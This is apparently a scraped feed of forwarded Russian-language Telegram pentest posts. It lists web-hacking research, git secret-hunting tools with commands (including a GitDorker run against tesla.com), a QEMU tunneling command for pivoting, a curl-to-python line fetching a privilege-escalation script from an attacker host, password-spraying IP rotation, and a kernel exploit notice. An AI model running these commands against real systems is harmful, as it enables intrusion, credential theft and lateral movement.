Forwarded from PT SWARM
PortSwigger's Top 10 web hacking techniques of 2023!
Welcome to the Top 10 Web Hacking Techniques of 2023, community-powered effort to identify the most important and innovative web security research published in the last year.
🥇 Smashing the state machine: the true potential of web race conditions
🥈 Exploiting Hardened .NET Deserialization
🥉 SMTP Smuggling - Spoofing E-Mails Worldwide
4️⃣ PHP filter chains: file read from error-based oracle
5️⃣ Exploiting HTTP Parsers Inconsistencies
6️⃣ HTTP Request Splitting vulnerabilities exploitation
7️⃣ How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
8️⃣ From Akamai to F5 to NTLM... with love
9️⃣ Cookie Crumbles: Breaking and Fixing Web Session Integrity
🔟 can I speak to your manager? hacking root EPP servers to take control of zones
The entire nomination list you can find here: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
Welcome to the Top 10 Web Hacking Techniques of 2023, community-powered effort to identify the most important and innovative web security research published in the last year.
🥇 Smashing the state machine: the true potential of web race conditions
🥈 Exploiting Hardened .NET Deserialization
🥉 SMTP Smuggling - Spoofing E-Mails Worldwide
4️⃣ PHP filter chains: file read from error-based oracle
5️⃣ Exploiting HTTP Parsers Inconsistencies
6️⃣ HTTP Request Splitting vulnerabilities exploitation
7️⃣ How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
8️⃣ From Akamai to F5 to NTLM... with love
9️⃣ Cookie Crumbles: Breaking and Fixing Web Session Integrity
🔟 can I speak to your manager? hacking root EPP servers to take control of zones
The entire nomination list you can find here: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
👾2
Forwarded from Интернет-Розыск
Ну и для облегчения исследования доменных имен...
▫️https://www.lopseg.com.br/osint
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
▫️https://www.lopseg.com.br/osint
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
❤1
Forwarded from #Arm1tage
Git утечки
Раз уж на то пошло, соберу здесь все инструменты, которыми пользуюсь для поиска утечек и других полезных вещей в гит репозиториях.
GitDorker - использует список дорков гита для поиска утечек, токенов, ключей и тп по ключевому слову.
github-dorks - тоже самое, только тут поиск происходит по репозиторию а не по ключевому слову.
git-dumper - если вы нашли на тестируемом сайте .git папку, с помощью этого вы можете сдампить все файлы, которые принадлежат этой папке.
trufflehog - об этом все знают, но не включит не мог. Поиск секретов по репозиториям git или github.
Важно добавить, что у гитхаба есть рейт-лимит, который ограничивает скорость до 30 запросов в минуту. Потому для полного сканирования потребуется некоторое время.
#git #tool
Раз уж на то пошло, соберу здесь все инструменты, которыми пользуюсь для поиска утечек и других полезных вещей в гит репозиториях.
GitDorker - использует список дорков гита для поиска утечек, токенов, ключей и тп по ключевому слову.
python3 GitDorker.py -tf TOKENSFILE -q tesla.com -d Dorks/DORKFILE -o tesla
github-dorks - тоже самое, только тут поиск происходит по репозиторию а не по ключевому слову.
github-dork.py -r techgaun/github-dorks
git-dumper - если вы нашли на тестируемом сайте .git папку, с помощью этого вы можете сдампить все файлы, которые принадлежат этой папке.
./git_dumper.py http://website.com/.git ~/website
trufflehog - об этом все знают, но не включит не мог. Поиск секретов по репозиториям git или github.
trufflehog git https://github.com/trufflesecurity/trufflehog.git
trufflehog github --repo=https://github.com/trufflesecurity/test_keys
Важно добавить, что у гитхаба есть рейт-лимит, который ограничивает скорость до 30 запросов в минуту. Потому для полного сканирования потребуется некоторое время.
#git #tool
❤2
Forwarded from true_security
Написал немного заметок про zabbix и интересные возможности.
читать
читать
Telegraph
заметки про zabbix
Иногда на тестах есть доступ к заббиксу с ограниченными правами, я покажу некоторые интересные вещи на примере заббикса на standoff365. У нас есть доступ к заббиксу с ограниченными правами, доступен только один хост, как на скрине: В самом заббиксе на мониторинге…
❤2
Forwarded from Внутрянка
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
Продолжу рассуждение…
❤1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
ADCS ESC 14...
https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9
А еще много будет?
#ad #redteam #pentest #adcs
https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9
А еще много будет?
#ad #redteam #pentest #adcs
SpecterOps
ADCS ESC14 Abuse Technique - SpecterOps
This blog post explores the various ways of abusing ADCS explicit certificate mapping, categorized as ESC14. Learn how weak explicit mappings can pose a serious risk.
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Forwarded from PT SWARM
🎁 Source Code Disclosure in IIS 10.0! Almost.
There is a method to reveal the source code of some .NET apps. Here's how it works.
👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
There is a method to reveal the source code of some .NET apps. Here's how it works.
👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
❤1🔥1
Forwarded from PurpleBear (Vadim Shelest)
Network tunneling with… QEMU?
Существует множество техник и инструментов для проксирования и создания туннелей в рамках
В блоге Securelist by Kaspersky опубликованы подробности техники использования киберзлодеями -
Суть техники заключается в создании
Другими словами подобная схема позволяет использовать созданные интерфейсы
🖇 References:
☑️ Network Pivoting Techniques
☑️ Сергей Зыбнев: туннельное мышление, или Разбираемся с pivoting
☑️ Caster - MikroTik Nightmare
#pivoting #QEMU
Существует множество техник и инструментов для проксирования и создания туннелей в рамках
Pivoting, которые позволяют атакующему получить доступ к локальным ресурсам, по сути, делая маршрутизируемым тот трафик, который в нормальных условиях не является маршрутизируемым😎 Но часто бывает, что нет возможности тащить что-то на отломанный хост, или архитектура процессора, ОС или ограниченные ресурсы этого просто не позволяют (например, в случаях с IoT девайсами🙈) Или вам просто очень нравится концепция LOTL и вы не боитесь экспериментов🔬В блоге Securelist by Kaspersky опубликованы подробности техники использования киберзлодеями -
QEMU в качестве инструмента для туннелирования. Для справки QEMU - это эмулятор аппаратного обеспечения различных платформ, позволяющий запускать различные гостевые операционные системы, другими словами это платформа программной виртуализации. Суть техники заключается в создании
network backend -netdev user, socket, hubport интерфейсов для создания туннелей к другим QEMU-виртуалкам внутри и за пределами сети с использованием network stack хоста qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev
socket,id=sock,connect=<IP>:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev
hubport,id=port-sock,hubid=0,netdev=sock -nographicДругими словами подобная схема позволяет использовать созданные интерфейсы
QEMU для классического туннелирования трафика, к тому же согласно документации QEMU поддерживает TAP, а значит по идее позволяет проводит L2 атаки😎 🖇 References:
☑️ Network Pivoting Techniques
☑️ Сергей Зыбнев: туннельное мышление, или Разбираемся с pivoting
☑️ Caster - MikroTik Nightmare
#pivoting #QEMU
Securelist
Network tunneling with… QEMU?
While investigating an incident, we detected uncommon malicious activity inside one of the systems. We ran an analysis on the artifacts, only to find that the adversary had deployed and launched the QEMU hardware emulator.
👨💻1
Вышла новая версия сканнера Nuclei (3.2.0). Теперь он умеет в фаззинг без танцев с бубном!
https://github.com/projectdiscovery/nuclei/releases/tag/v3.2.0
https://github.com/projectdiscovery/nuclei/releases/tag/v3.2.0
GitHub
Release v3.2.0 · projectdiscovery/nuclei
What's Changed
🎉 New Features
Added fuzzing support in http protocol by @Ice3man543, @tarunKoyalwar in #4477
Added authenticated scaning support by @tarunKoyalwar in #4477
Added -fuzz option f...
🎉 New Features
Added fuzzing support in http protocol by @Ice3man543, @tarunKoyalwar in #4477
Added authenticated scaning support by @tarunKoyalwar in #4477
Added -fuzz option f...
🔥2
Forwarded from Kali Linux
This media is not supported in your browser
VIEW IN TELEGRAM
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду
sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.Основные особенности:
curl http://attackerhost/gtfonow.py | python@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cybred
Git-Rotate
Альтернатива IPRotate на базе Github Actions. Позволяет получить большой пул IP-адресов для обхода рейт лимитов.
Статья https://research.aurainfosec.io/pentest/git-rotate/
Утилита https://github.com/dunderhay/git-rotate
Альтернатива IPRotate на базе Github Actions. Позволяет получить большой пул IP-адресов для обхода рейт лимитов.
Статья https://research.aurainfosec.io/pentest/git-rotate/
Утилита https://github.com/dunderhay/git-rotate
GitHub
GitHub - dunderhay/git-rotate: Leveraging GitHub Actions to rotate IP addresses during password spraying attacks to bypass IP-Based…
Leveraging GitHub Actions to rotate IP addresses during password spraying attacks to bypass IP-Based blocking - dunderhay/git-rotate
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Пост должен был выйти чуть позже, но увидев, что скоро начнется соревнование для попадания на Standoff 13👨💻 я решил выпустить его чуть раньше. Он может вам пригодиться, особенно, если оценивать прошлый год.
В последние годы пентестеры все больше обращают внимание на присутствие платформ DevOps, а уже и DevSecOps. Эти экосистемы состоят из различных сервисов, используемых в конвейерах CI/CD, включая:
Для злоумышленников и пентестеров экосистема CI/CD представляет собой "обоюдоострый меч" — богатство информации и потенциальные точки входа. Слияние множества сервисов, от репозиториев до серверов автоматизации, хранит в себе кучу данных, включая исходный код, образы контейнеров и различные учетные данные
Мой личный опыт работы показывает, что компрометация облачных сервисов через CI/CD — это быстрый путь к эскалации. (привет уязвимостям в GitLab
📕
Пример таких уязвимостей:
CVE-2022-2185 — ТЫК
CVE-2021-22205 — ТЫК
CVE-2023-5009 — ТЫК
CVE-2023-7028 — ТЫК
CVE-2024-0402 — ТЫК
Но тут возникают сложности... множество целей в экосистеме CI/CD, зависимость от официальных API для атак и огромный объем данных требуют стратегического и автоматизированного подхода.
Epyon был представлен в 2022 году как универсальный инструмент для работы пентестеров в экосистемах CI/CD. Разработанный на языке
Модули Epyon охватывают широкий спектр, включая:
1. Gitlab
2. Github
3. Jenkins
4. Azure DevOps
5. Sonatype Nexus
6. Docker Registry
7. Sonarqube
8. Gitea
9. Artifactory
10. Terraform Cloud/Enterprise
Я протестировал его в своей домашней лаборатории, изучив модули Gitlab(community), Jenkins, Nexus(community) и Docker Registry (про него и поговорим).
Изначально хотел проверить на Gitlab, но столкнулся с проблемой. У меня слишком много проектов, которые пришлось бы скрывать, чтобы не показывать спойлеры для будущих проектов и стратап-идей.
Пример: HTTP API Docker Registry.
Команда
epyon registry может быть использована для взаимодействия с реестром Docker:Epyon позволяет пользователям легко взаимодействовать с API реестра и получать информацию о нескольких образах контейнеров. Следующий список показывает шаги, которые были выполнены в этом примере:
Опция
list-images может быть использована для перечисления всех образов контейнеров. Опция
list-tags получит все доступные теги для каждого образа. Опция
download-images загрузит и извлечет содержимое образа (загруженные файлы будут помещены в каталог, указанный в файле config.yaml).Недавно в каком-то из чатов спрашивали про поиск учеток в докере. Так вот, как там и ответил, я буду использовать Trufflehog.
Вот нами уже и найдены login/pass, api key и много других критически важных артефактов
В нашем деле важно уметь сокращать время, затрачиваемое на выполнение рутинных задач. И данный инструмент с этим справляется как нельзя кстати. Из минусов хочу отметить отсутствие тонкой настройки работы через конфиг, хотя сделать это через библиотеку go viper достаточно просто.
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from GreyTeam | Хакеры
«За долгое время работы насобирали много шишек, как своих, так и чужих, подслушанных в кулуарах (эти истории включены с одобрения владельцев). С радостью дадим вам вредных советов, чтобы вы могли набить такие же. Хорошим пентестерам к прочтению запрещено!»
#pentest
#osint
https://telegra.ph/Kak-zaporot-fishing-sovety-pentesteram-03-21
#pentest
#osint
https://telegra.ph/Kak-zaporot-fishing-sovety-pentesteram-03-21
Telegraph
Как запороть фишинг: советы пентестерам
Привет, меня зовут Дмитрий Семьянов, и я специалист по тестированию на проникновение в Innostage. Мы в команде регулярно проводим фишинговые рассылки для своей компании и наших заказчиков. За долгое время работы насобирали много шишек, как своих, так и чужих…
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-1086 Linux kernel LPE
Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
A full write-up of the exploit - including background information and loads of useful diagrams - can be found in the Flipping Pages blogpost.
Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
A full write-up of the exploit - including background information and loads of useful diagrams - can be found in the Flipping Pages blogpost.
🔥1
Kerberos простыми словами
Прекрасный лонгрид от Юрия Строжевского про механизм работы протокола Kerberos, его технические ньюансы, а также о способе его тестирования.
👁 Читать
Прекрасный лонгрид от Юрия Строжевского про механизм работы протокола Kerberos, его технические ньюансы, а также о способе его тестирования.
👁 Читать
Хабр
Kerberos простыми словами
Введение Несмотря на то, что уже существует множество различных статей про Kerberos, я всё‑таки решил написать ещё одну. Прежде всего эта статья написана для меня лично: я...